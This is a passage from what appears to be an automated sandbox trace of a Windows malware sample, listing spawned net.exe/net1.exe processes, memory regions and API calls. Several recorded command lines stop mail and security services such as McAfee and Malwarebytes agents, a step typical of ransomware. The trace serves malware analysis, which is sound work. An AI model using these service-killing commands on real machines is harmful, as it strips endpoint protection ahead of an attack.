lpMode=0x22f738 | out: lpMode=0x22f738) returned 1 [0098.052] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffd81efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x22f730, lpReserved=0x0 | out: lpBuffer=0xffd81efc*, lpNumberOfCharsWritten=0x22f730*=0x2) returned 1 [0098.053] NetApiBufferFree (Buffer=0x2d4d40) returned 0x0 [0098.053] NetApiBufferFree (Buffer=0x2dc0e0) returned 0x0 [0098.053] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop IMAP4Svc /y" [0098.053] exit (_Code=2) Process: id = "126" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x60d44000" os_pid = "0xfac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "123" os_parent_pid = "0xfdc" cmd_line = "C:\\Windows\\system32\\net1 stop macmnsvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5890 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5891 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5892 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5893 start_va = 0x1d0000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 5894 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5895 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5896 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5897 start_va = 0xffd80000 end_va = 0xffdb2fff entry_point = 0xffd80000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 5898 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5899 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5900 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 5901 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5902 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 5903 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5904 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5905 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5906 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5907 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5908 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 5909 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 5910 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5911 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5912 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 5913 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 5914 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 5915 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 5916 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 5917 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 5918 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 5919 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 5920 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 5921 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 5922 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5923 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5924 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 5925 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 5926 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5927 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5944 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 538 os_tid = 0xd30 [0098.005] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fd30 | out: lpSystemTimeAsFileTime=0x24fd30*(dwLowDateTime=0xef9601b0, dwHighDateTime=0x1d48689)) [0098.005] GetCurrentProcessId () returned 0xfac [0098.005] GetCurrentThreadId () returned 0xd30 [0098.005] GetTickCount () returned 0x224be [0098.005] QueryPerformanceCounter (in: lpPerformanceCount=0x24fd38 | out: lpPerformanceCount=0x24fd38*=1814492300000) returned 1 [0098.007] GetModuleHandleW (lpModuleName=0x0) returned 0xffd80000 [0098.007] __set_app_type (_Type=0x1) [0098.007] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffd99c9c) returned 0x0 [0098.007] __getmainargs (in: _Argc=0xffda4780, _Argv=0xffda4790, _Env=0xffda4788, _DoWildCard=0, _StartInfo=0xffda479c | out: _Argc=0xffda4780, _Argv=0xffda4790, _Env=0xffda4788) returned 0 [0098.007] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0098.007] GetConsoleOutputCP () returned 0x1b5 [0098.054] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffdacec0 | out: lpCPInfo=0xffdacec0) returned 1 [0098.054] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0098.056] sprintf_s (in: _DstBuf=0x24fcd8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0098.056] setlocale (category=0, locale=".437") returned="English_United States.437" [0098.057] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0098.057] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0098.057] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop macmnsvc /y" [0098.057] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x24fa70, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0098.058] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0098.058] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24fcc8 | out: Buffer=0x24fcc8*=0x3b4d40) returned 0x0 [0098.058] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x24fcc8 | out: Buffer=0x24fcc8*=0x3bc0e0) returned 0x0 [0098.058] _fileno (_File=0x7fefdba2a80) returned 0 [0098.058] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0098.058] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0098.058] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0098.058] _wcsicmp (_String1="config", _String2="stop") returned -16 [0098.058] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0098.058] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0098.058] _wcsicmp (_String1="file", _String2="stop") returned -13 [0098.058] _wcsicmp (_String1="files", _String2="stop") returned -13 [0098.058] _wcsicmp (_String1="group", _String2="stop") returned -12 [0098.058] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0098.058] _wcsicmp (_String1="help", _String2="stop") returned -11 [0098.058] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0098.058] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0098.058] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0098.058] _wcsicmp (_String1="session", _String2="stop") returned -15 [0098.058] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0098.058] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0098.058] _wcsicmp (_String1="share", _String2="stop") returned -12 [0098.058] _wcsicmp (_String1="start", _String2="stop") returned -14 [0098.059] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0098.059] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0098.059] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0098.059] _wcsicmp (_String1="accounts", _String2="macmnsvc") returned -12 [0098.059] _wcsicmp (_String1="computer", _String2="macmnsvc") returned -10 [0098.059] _wcsicmp (_String1="config", _String2="macmnsvc") returned -10 [0098.059] _wcsicmp (_String1="continue", _String2="macmnsvc") returned -10 [0098.059] _wcsicmp (_String1="cont", _String2="macmnsvc") returned -10 [0098.059] _wcsicmp (_String1="file", _String2="macmnsvc") returned -7 [0098.059] _wcsicmp (_String1="files", _String2="macmnsvc") returned -7 [0098.059] _wcsicmp (_String1="group", _String2="macmnsvc") returned -6 [0098.059] _wcsicmp (_String1="groups", _String2="macmnsvc") returned -6 [0098.059] _wcsicmp (_String1="help", _String2="macmnsvc") returned -5 [0098.059] _wcsicmp (_String1="helpmsg", _String2="macmnsvc") returned -5 [0098.059] _wcsicmp (_String1="localgroup", _String2="macmnsvc") returned -1 [0098.059] _wcsicmp (_String1="pause", _String2="macmnsvc") returned 3 [0098.059] _wcsicmp (_String1="session", _String2="macmnsvc") returned 6 [0098.059] _wcsicmp (_String1="sessions", _String2="macmnsvc") returned 6 [0098.059] _wcsicmp (_String1="sess", _String2="macmnsvc") returned 6 [0098.059] _wcsicmp (_String1="share", _String2="macmnsvc") returned 6 [0098.059] _wcsicmp (_String1="start", _String2="macmnsvc") returned 6 [0098.059] _wcsicmp (_String1="stats", _String2="macmnsvc") returned 6 [0098.059] _wcsicmp (_String1="statistics", _String2="macmnsvc") returned 6 [0098.059] _wcsicmp (_String1="stop", _String2="macmnsvc") returned 6 [0098.059] _wcsicmp (_String1="time", _String2="macmnsvc") returned 7 [0098.059] _wcsicmp (_String1="user", _String2="macmnsvc") returned 8 [0098.059] _wcsicmp (_String1="users", _String2="macmnsvc") returned 8 [0098.059] _wcsicmp (_String1="msg", _String2="macmnsvc") returned 18 [0098.059] _wcsicmp (_String1="messenger", _String2="macmnsvc") returned 4 [0098.059] _wcsicmp (_String1="receiver", _String2="macmnsvc") returned 5 [0098.059] _wcsicmp (_String1="rcv", _String2="macmnsvc") returned 5 [0098.059] _wcsicmp (_String1="netpopup", _String2="macmnsvc") returned 1 [0098.059] _wcsicmp (_String1="redirector", _String2="macmnsvc") returned 5 [0098.059] _wcsicmp (_String1="redir", _String2="macmnsvc") returned 5 [0098.060] _wcsicmp (_String1="rdr", _String2="macmnsvc") returned 5 [0098.060] _wcsicmp (_String1="workstation", _String2="macmnsvc") returned 10 [0098.060] _wcsicmp (_String1="work", _String2="macmnsvc") returned 10 [0098.060] _wcsicmp (_String1="wksta", _String2="macmnsvc") returned 10 [0098.060] _wcsicmp (_String1="prdr", _String2="macmnsvc") returned 3 [0098.060] _wcsicmp (_String1="devrdr", _String2="macmnsvc") returned -9 [0098.060] _wcsicmp (_String1="lanmanworkstation", _String2="macmnsvc") returned -1 [0098.060] _wcsicmp (_String1="server", _String2="macmnsvc") returned 6 [0098.060] _wcsicmp (_String1="svr", _String2="macmnsvc") returned 6 [0098.060] _wcsicmp (_String1="srv", _String2="macmnsvc") returned 6 [0098.060] _wcsicmp (_String1="lanmanserver", _String2="macmnsvc") returned -1 [0098.060] _wcsicmp (_String1="alerter", _String2="macmnsvc") returned -12 [0098.060] _wcsicmp (_String1="netlogon", _String2="macmnsvc") returned 1 [0098.060] _wcsupr (in: _String="macmnsvc" | out: _String="MACMNSVC") returned="MACMNSVC" [0098.060] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3bcdf0 [0098.064] GetServiceKeyNameW (in: hSCManager=0x3bcdf0, lpDisplayName="MACMNSVC", lpServiceName=0xffda5750, lpcchBuffer=0x24fbe8 | out: lpServiceName="", lpcchBuffer=0x24fbe8) returned 0 [0098.065] _wcsicmp (_String1="msg", _String2="MACMNSVC") returned 18 [0098.065] _wcsicmp (_String1="messenger", _String2="MACMNSVC") returned 4 [0098.065] _wcsicmp (_String1="receiver", _String2="MACMNSVC") returned 5 [0098.065] _wcsicmp (_String1="rcv", _String2="MACMNSVC") returned 5 [0098.065] _wcsicmp (_String1="redirector", _String2="MACMNSVC") returned 5 [0098.066] _wcsicmp (_String1="redir", _String2="MACMNSVC") returned 5 [0098.066] _wcsicmp (_String1="rdr", _String2="MACMNSVC") returned 5 [0098.066] _wcsicmp (_String1="workstation", _String2="MACMNSVC") returned 10 [0098.066] _wcsicmp (_String1="work", _String2="MACMNSVC") returned 10 [0098.066] _wcsicmp (_String1="wksta", _String2="MACMNSVC") returned 10 [0098.066] _wcsicmp (_String1="prdr", _String2="MACMNSVC") returned 3 [0098.066] _wcsicmp (_String1="devrdr", _String2="MACMNSVC") returned -9 [0098.066] _wcsicmp (_String1="lanmanworkstation", _String2="MACMNSVC") returned -1 [0098.066] _wcsicmp (_String1="server", _String2="MACMNSVC") returned 6 [0098.066] _wcsicmp (_String1="svr", _String2="MACMNSVC") returned 6 [0098.066] _wcsicmp (_String1="srv", _String2="MACMNSVC") returned 6 [0098.066] _wcsicmp (_String1="lanmanserver", _String2="MACMNSVC") returned -1 [0098.066] _wcsicmp (_String1="alerter", _String2="MACMNSVC") returned -12 [0098.066] _wcsicmp (_String1="netlogon", _String2="MACMNSVC") returned 1 [0098.066] NetServiceControl (in: servername=0x0, service="MACMNSVC", opcode=0x0, arg=0x0, bufptr=0x24fbf0 | out: bufptr=0x24fbf0) returned 0x889 [0098.067] wcscpy_s (in: _Destination=0xffda80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0098.067] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0098.068] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffda5b50, nSize=0x800, Arguments=0xffda7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0098.073] GetFileType (hFile=0xb) returned 0x2 [0098.074] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24fab8 | out: lpMode=0x24fab8) returned 1 [0098.074] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffda5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x24fab0, lpReserved=0x0 | out: lpBuffer=0xffda5b50*, lpNumberOfCharsWritten=0x24fab0*=0x1e) returned 1 [0098.074] GetFileType (hFile=0xb) returned 0x2 [0098.075] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24fab8 | out: lpMode=0x24fab8) returned 1 [0098.075] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffd81efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24fab0, lpReserved=0x0 | out: lpBuffer=0xffd81efc*, lpNumberOfCharsWritten=0x24fab0*=0x2) returned 1 [0098.075] _ultow (in: _Dest=0x889, _Radix=2423584 | out: _Dest=0x889) returned="2185" [0098.075] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffda5b50, nSize=0x800, Arguments=0xffda7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0098.075] GetFileType (hFile=0xb) returned 0x2 [0098.076] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24fab8 | out: lpMode=0x24fab8) returned 1 [0098.076] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffda5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x24fab0, lpReserved=0x0 | out: lpBuffer=0xffda5b50*, lpNumberOfCharsWritten=0x24fab0*=0x34) returned 1 [0098.076] GetFileType (hFile=0xb) returned 0x2 [0098.076] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x24fab8 | out: lpMode=0x24fab8) returned 1 [0098.077] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffd81efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24fab0, lpReserved=0x0 | out: lpBuffer=0xffd81efc*, lpNumberOfCharsWritten=0x24fab0*=0x2) returned 1 [0098.077] NetApiBufferFree (Buffer=0x3b4d40) returned 0x0 [0098.077] NetApiBufferFree (Buffer=0x3bc0e0) returned 0x0 [0098.077] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop macmnsvc /y" [0098.077] exit (_Code=2) Process: id = "127" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x60593000" os_pid = "0x1078" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MBAMService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5928 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5929 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5930 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5931 start_va = 0x90000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 5932 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5933 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5934 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5935 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 5936 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5937 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5938 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 5939 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5940 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 5941 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5942 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 539 os_tid = 0x1080 Process: id = "128" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x538b3000" os_pid = "0xce8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop MBEndpointAgent /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5945 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5946 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5947 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5948 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 5949 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5950 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5951 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5952 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 5953 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5954 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5955 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 5956 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 5957 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 5958 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5959 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 541 os_tid = 0x101c Process: id = "129" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5f2d2000" os_pid = "0xdf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop McAfeeEngineService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5968 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5969 start_va = 0x30000 end_va = 0x33fff entry_point 